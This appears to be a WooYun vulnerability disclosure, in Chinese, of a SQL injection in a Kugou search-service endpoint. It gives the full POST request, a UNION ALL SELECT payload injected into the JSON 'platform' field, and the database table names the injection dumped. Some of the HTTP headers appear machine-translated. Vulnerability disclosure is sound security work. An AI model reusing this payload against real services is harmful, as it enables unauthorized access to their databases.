漏洞标题 酷狗POST SQL注入漏洞(可以联合查询) 相关制造商 酷狗 漏洞作者 酱 提交时间 2016-04-27 15: 09 公共时间 2016-06-11 15: 30 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 12 漏洞状态 制造商已确认 标签标签 漏洞详细信息 POST/v1/word_nofocus HTTP/1.1 主机: so.service.kugou.com 用户代理: Mozilla/5.0(Windows NT 10.0; WOW64; rv: 45.0)Gecko/20100101 Firefox/45.0 接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8 Accept-Language: zh-CN,zh; q=0.8,en-US; q=0.5,en; Q=0.3 Accept-Encoding: gzip,deflate DNT: 1 连接:保持活动状态 内容类型: application/x-www-form-urlencoded 内容长度: 159 {'appid': 1001,'clientver': 7685,'mid':'{9A228215-41D9-43AD-9A0C-613E7BA51838}','key':'980dfa886df5d7e4145037b79ef30c05','clienttime': 1460173869,'platform':' PC'} 漏洞证明: 参数: JSON平台((自定义)POST) 键入: UNION查询 标题: MySQL UNION查询(19) - 7列 有效载荷: {'appid': 1001,'clientver': 7680,'mid':'{7553F95E-DB33-45F7-BC84-1D68DC89A4A8}','key':'226698017d6ef361ed10c7caf898b19f','clienttime': 1458471609,'platform':'cc'UNION ALL SELECT 19,CONCAT(0x71716a7a71,0x5157587053536246577971567766577847614543486e58417857786b476876757a5a6d656a41596e,0x716b766a71)#'} --- Failure when receiving data from the peer | correction_exception | | diy_sort | | error_correction | | kw_operate | | likeword | | onblur_tips | | onblur_tips_logs | | search_source | | shielded_scids | | shielded_songs | | song_album | | song_global | | song_hot | | song_special | | song_tag | | tag_search | + ---------------------- + 修理计划: 版权声明:请注明来源@乌云